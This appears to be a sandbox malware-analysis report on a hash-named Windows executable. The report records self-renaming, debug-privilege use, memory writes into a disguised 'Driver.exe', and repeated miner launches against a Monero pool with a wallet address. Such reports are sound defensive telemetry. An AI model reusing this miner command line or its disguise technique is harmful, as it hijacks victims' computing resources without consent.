N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Suspicious behavior: RenamesItself

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 856 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1420 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1268 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 1124 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
PID 856 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe

"C:\Users\Admin\AppData\Local\Temp\e9fca3db7f9c56f58cc1e28118c9897aa3cd0d2e052c62b3aed472bede51e467.exe"

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 84pG1E7UKYvgbggJxjsMMQMKXFPdLCWknN17Fd2todfvLfRAC7psryqVBihgQfGHEidGgoh4G24xn8WeabSAzPYjS3h8zGH -p x -k -v=0 --donate-level=1 -t 1

C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

